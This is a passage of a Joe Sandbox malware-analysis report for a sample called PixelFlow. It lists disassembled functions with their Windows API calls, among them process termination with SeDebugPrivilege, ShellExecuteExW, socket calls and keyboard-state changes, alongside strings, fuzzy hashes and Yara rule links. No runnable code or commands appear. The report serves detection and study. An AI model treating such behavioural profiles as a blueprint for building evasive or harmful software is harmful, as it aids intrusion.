Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: c0022bee069789965ce89422216a2a0d94c1500fc2a29de206d04f2adfae0d74
Instruction ID: 2514748376790123cfa2695bb9c8d6377d897d11007172b74a872a878407ef64
Opcode Fuzzy Hash: c0022bee069789965ce89422216a2a0d94c1500fc2a29de206d04f2adfae0d74
Instruction Fuzzy Hash: 0F01B6B5240308BFFB10AFA5DC4DF6B7BADEB88711F419412FA05DB6A1CA709804CB64

Function 006795C5 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00679619
VariantInit.OLEAUT32(?), ref: 006796EA
VariantInit.OLEAUT32(?), ref: 006797EB
VariantClear.OLEAUT32(?), ref: 006797F5
VariantClear.OLEAUT32(?), ref: 00679852

Strings

Incorrect Object type in FOR..IN loop, xrefs: 006797CE
Null Object assignment in FOR..IN loop, xrefs: 0067967A, 006797A8, 00679860

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: a26d837fba8c0466d996cb9b2ebda4bf21e00859ce8cf2a8321f0e909d103ede
Instruction ID: 05053c6774f4b59aab370bacb9748007a1c6f373caf4d3f9350808f408620573
Opcode Fuzzy Hash: a26d837fba8c0466d996cb9b2ebda4bf21e00859ce8cf2a8321f0e909d103ede
Instruction Fuzzy Hash: B5919A70A00219ABDF24CFA5C884FEEBBFAEF45710F108519F519AB291D770A945CFA0

Function 00679C0F Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00657B0B: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?,?,?,00657E56), ref: 00657B28
Part of subcall function 00657B0B: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?,?), ref: 00657B43
Part of subcall function 00657B0B: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?,?), ref: 00657B51
Part of subcall function 00657B0B: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?), ref: 00657B61

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00679CB8
_memset.LIBCMT ref: 00679CC5
_memset.LIBCMT ref: 00679E08
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00679E34
CoTaskMemFree.OLE32(?), ref: 00679E3F

Strings

NULL Pointer assignment, xrefs: 00679E8D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: dce05f244eea81819c1e0e43608d7c6546528091d9979e82e152e2a7a0b479b4
Instruction ID: 8d12266f6bedad01caa4eecaad657ce296c98681dacb73c888b95de9dbbd2be4
Opcode Fuzzy Hash: dce05f244eea81819c1e0e43608d7c6546528091d9979e82e152e2a7a0b479b4
Instruction Fuzzy Hash: 26912871D00229EBDB10DFA4D885EDEBBBAEF09310F10815AF519A7291DB719A45CFA0

Function 0068716D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00687211
SendMessageW.USER32(?,00001036,00000000,?), ref: 00687225
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0068723F
_wcscat.LIBCMT ref: 0068729A
SendMessageW.USER32(?,00001057,00000000,?), ref: 006872B1
SendMessageW.USER32(?,00001061,?,0000000F), ref: 006872DF

Strings

SysListView32, xrefs: 006871E3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: b9decf61ced19ab9fde61eb03841b7eef1cf7a10bafe217b6b64025b80152494
Instruction ID: f3c2ecfdfaf00526117725e43202627f118e0a7dab8ac20387b5372250ebe31e
Opcode Fuzzy Hash: b9decf61ced19ab9fde61eb03841b7eef1cf7a10bafe217b6b64025b80152494
Instruction Fuzzy Hash: A941A271904308AFEB21EFA4CC85FEE77AAEF48350F10052AF994A7291D771DD848B64

Function 0067EDE4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00663FB5: CreateToolhelp32Snapshot.KERNEL32 ref: 00663FDA
Part of subcall function 00663FB5: Process32FirstW.KERNEL32(00000000,?), ref: 00663FE8
Part of subcall function 00663FB5: FindCloseChangeNotification.KERNELBASE(00000000), ref: 006640B2

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067EE55
GetLastError.KERNEL32 ref: 0067EE68
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067EE97
TerminateProcess.KERNEL32(00000000,00000000), ref: 0067EF14
GetLastError.KERNEL32(00000000), ref: 0067EF1F
CloseHandle.KERNEL32(00000000), ref: 0067EF54

Strings

SeDebugPrivilege, xrefs: 0067EE73

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 4030f0b9c12687b1f846ca70e3b39401975fee9d7c3bd0587ea3ce8e78064cb7
Instruction ID: 1eb429c57e88452d80b224280d305580d3f959dd238a3d90581e4757a023e614
Opcode Fuzzy Hash: 4030f0b9c12687b1f846ca70e3b39401975fee9d7c3bd0587ea3ce8e78064cb7
Instruction Fuzzy Hash: 9C41DE712002019FDB25EF64DC95FAEB7A7AF48310F08845DF90A5B3C2CB75A848CB99

Function 00664655 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0066466F
LoadStringW.USER32(00000000), ref: 00664676
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0066468C
LoadStringW.USER32(00000000), ref: 00664693
_wprintf.LIBCMT ref: 006646B9
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006646D7

Strings

%s (%d) : ==> %s: %s %s, xrefs: 006646B4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: ebf4979abba7aedc799c5678c58c14687f8ad23ac859f9cd6bc423c67fe973ad
Instruction ID: 1f837a1823532aff6c36c26e64d72dd271bbf4d918b410b5e52cc407eb8fa49c
Opcode Fuzzy Hash: ebf4979abba7aedc799c5678c58c14687f8ad23ac859f9cd6bc423c67fe973ad
Instruction Fuzzy Hash: 25014BF29442087FE751ABA19D89EF6776DEB08300F000596BB49E2541EA749E848B74

Function 0068D861 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

GetSystemMetrics.USER32(0000000F), ref: 0068D89F
GetSystemMetrics.USER32(0000000F), ref: 0068D8BF
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0068DAFA
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0068DB18
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0068DB39
ShowWindow.USER32(00000003,00000000), ref: 0068DB58
InvalidateRect.USER32(?,00000000,00000001), ref: 0068DB7D
DefDlgProcW.USER32(?,00000005,?,?), ref: 0068DBA0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 36ea20af718ec209656940255a679d67cd0980553b2a8e260f523c56c12dd6a4
Instruction ID: 54cec9a49d028d4990b1aeeefb686229615ff862ebe49ecc92a6f04b440cc008
Opcode Fuzzy Hash: 36ea20af718ec209656940255a679d67cd0980553b2a8e260f523c56c12dd6a4
Instruction Fuzzy Hash: A5B18971600215EFDF18EF68C985BED7BB2FF04711F198269EC48AB295D734A950CB60

Function 00680139 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 00681242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006801D5,?,?), ref: 00681259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680216

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 231c9a0bab3ac095f8628a09ebbe21a68d98010ebef70139fb02864f3affd2e4
Instruction ID: 416dd4ea6b70697b6d65fce196c0f4e8e9b6b544ef0eab1f40c328488eff33ac
Opcode Fuzzy Hash: 231c9a0bab3ac095f8628a09ebbe21a68d98010ebef70139fb02864f3affd2e4
Instruction Fuzzy Hash: ABA1B070204201DFD790EF54C891B6EB7E6FF85314F04891DFA969B2A2DB31E949CB45

Function 00602E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C438,00000004,00000000,00000000,00000000), ref: 00602E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0063C438,00000004,00000000,00000000,00000000,000000FF), ref: 00602EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0063C438,00000004,00000000,00000000,00000000), ref: 0063C48B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C438,00000004,00000000,00000000,00000000), ref: 0063C4F7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 494dcd6a6c85007eb09b6967137378d97f80fd2fa11a3f73d45803c0625a4bc4
Instruction ID: 048b9a7ce302ad71c2bfd0cddf02c7baf8e9baf2229debec2c1406eb45cfecd0
Opcode Fuzzy Hash: 494dcd6a6c85007eb09b6967137378d97f80fd2fa11a3f73d45803c0625a4bc4
Instruction Fuzzy Hash: 2541E5316C47829ED77E8B28D8ACABB7B97AF81314F28840DF44756AE1C771A842D750

Function 006865C0 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006865D8
GetDC.USER32(00000000), ref: 006865E0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006865EB
ReleaseDC.USER32(00000000,00000000), ref: 006865F7
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00686633
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00686644
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00689417,?,?,000000FF,00000000,?,000000FF,?), ref: 0068667E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0068669E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 09e92f605b9cc50ceb9dea0ef2c5932974961c239b7e9525e755e804b5650e4d
Instruction ID: 77acff2aa88a84e7b1a57a542736946610fe73e1abf9dbfe4d10625a57c2f0c5
Opcode Fuzzy Hash: 09e92f605b9cc50ceb9dea0ef2c5932974961c239b7e9525e755e804b5650e4d
Instruction Fuzzy Hash: 8F317A72101214AFEF119F54CC8AFEA3BAEEF4A761F040156FE08AA291D7759851CBB4

Function 0065C52B Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0065C540
_memcmp.LIBCMT ref: 0065C562
_memcmp.LIBCMT ref: 0065C57A
_memcmp.LIBCMT ref: 0065C58D
_memcmp.LIBCMT ref: 0065C5A7
_memcmp.LIBCMT ref: 0065C5BA
_memcmp.LIBCMT ref: 0065C5D2
_memcmp.LIBCMT ref: 0065C5ED

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 2d273ceb08672112d73c489ed5fc86f9e20ccc7ca17037a64e31ab82fdf757d8
Instruction ID: 0215781db2b86050b45f078ced272a64aa5bd8f6d388a0e4533334a3949b894c
Opcode Fuzzy Hash: 2d273ceb08672112d73c489ed5fc86f9e20ccc7ca17037a64e31ab82fdf757d8
Instruction Fuzzy Hash: 4B213AA5A04B257FD60065549D82FFB331F9E553A2F000066FC06EA742F760EF3A85A8

Function 0066EFD3 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

Part of subcall function 0061436A: _wcscpy.LIBCMT ref: 0061438D

_wcstok.LIBCMT ref: 0066F144
_wcscpy.LIBCMT ref: 0066F1D3
_memset.LIBCMT ref: 0066F206

Strings

X, xrefs: 0066F243

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: d45a355d0c4c6400c18f60fccdbdccc6dbadeed2c434620c80cd966a75b945db
Instruction ID: ab571fe3342a2a1b14b16b4fb4493cc20d6c2e2701d669d76bb01eba22196822
Opcode Fuzzy Hash: d45a355d0c4c6400c18f60fccdbdccc6dbadeed2c434620c80cd966a75b945db
Instruction Fuzzy Hash: 9BC19B705043019FC7A4EF24D891A9BB7E6EF85350F04492DF99A9B3A2DB30ED45CB86

Function 00676FB3 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006770B0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006770D1
WSAGetLastError.WSOCK32(00000000), ref: 006770E4
htons.WSOCK32(?,?,?,00000000,?), ref: 0067719A
inet_ntoa.WSOCK32(?), ref: 00677157

Part of subcall function 0065B2CD: _strlen.LIBCMT ref: 0065B2D7
Part of subcall function 0065B2CD: _memmove.LIBCMT ref: 0065B2F9

_strlen.LIBCMT ref: 006771F4
_memmove.LIBCMT ref: 0067725D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: b2266ec29f13b9f5f25a3d4d1421b530915d28bf6ecb0777d1726d7e9bdce3cc
Instruction ID: 75dc3a40701164247cd437cf8ee018ad1929b33c43aa41782ae18cd91e1b580a
Opcode Fuzzy Hash: b2266ec29f13b9f5f25a3d4d1421b530915d28bf6ecb0777d1726d7e9bdce3cc
Instruction Fuzzy Hash: 9C81D271108200AFD364EF24DC81FAFB7AAAF84714F14851DF66A9B2D2DB709E41CB95

Function 00601800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9eee447aca7071dd198b590e5d84de16e29a8b0b6924fb85e9ec346b559cd2d
Instruction ID: 0d1ccfbd5df098c0abfe7fa74e89bdc775532a45eede1dad8382ce26b3b0c0ac
Opcode Fuzzy Hash: a9eee447aca7071dd198b590e5d84de16e29a8b0b6924fb85e9ec346b559cd2d
Instruction Fuzzy Hash: 09715E30940109EFDB09DF98CC49AFFBB7AFF86314F148159F915AA291C7709A52CBA4

Function 0068B73E Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00CE55D0), ref: 0068B7D8
IsWindowEnabled.USER32(00CE55D0), ref: 0068B7E4
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0068B8C8
SendMessageW.USER32(00CE55D0,000000B0,?,?), ref: 0068B8FF
IsDlgButtonChecked.USER32(?,?), ref: 0068B93C
GetWindowLongW.USER32(00CE55D0,000000EC), ref: 0068B95E
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0068B976

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 19767fb64e04daa294dfcca9154a89bb8f5b405c24e5c892eec7f1ba283ee636
Instruction ID: 755be321d1218bc0eec00ee80d4916a24504a961dec217e5f8fbf2ac05693ea5
Opcode Fuzzy Hash: 19767fb64e04daa294dfcca9154a89bb8f5b405c24e5c892eec7f1ba283ee636
Instruction Fuzzy Hash: 20718B74A00204AFEB20AF54C894FFA7BBBEF89300F146659F956973A1C731A850CB25

Function 0067F8CF Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067F8F9
_memset.LIBCMT ref: 0067F9C2
ShellExecuteExW.SHELL32(?), ref: 0067FA07

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

Part of subcall function 0061436A: _wcscpy.LIBCMT ref: 0061438D

GetProcessId.KERNEL32(00000000), ref: 0067FA7E
CloseHandle.KERNEL32(00000000), ref: 0067FAAD

Strings

@, xrefs: 0067F9D6

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: de30c2cb8ae96a6ceb9454a7a61d9acc8a10f501ba99f786974f75a6f4fbc245
Instruction ID: fddf501449371df8d8436760222c1afbcf60d9a9588f3f77048535abd05c43ec
Opcode Fuzzy Hash: de30c2cb8ae96a6ceb9454a7a61d9acc8a10f501ba99f786974f75a6f4fbc245
Instruction Fuzzy Hash: 2F618BB5A00619DFCB14EF94C580AAEB7F6FF48310B14856DE95AAB391CB30AD41CF94

Function 006615B8 Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 006615F7
GetKeyboardState.USER32(?), ref: 0066160C
SetKeyboardState.USER32(?), ref: 0066166D
PostMessageW.USER32(?,00000101,00000010,?), ref: 0066169B
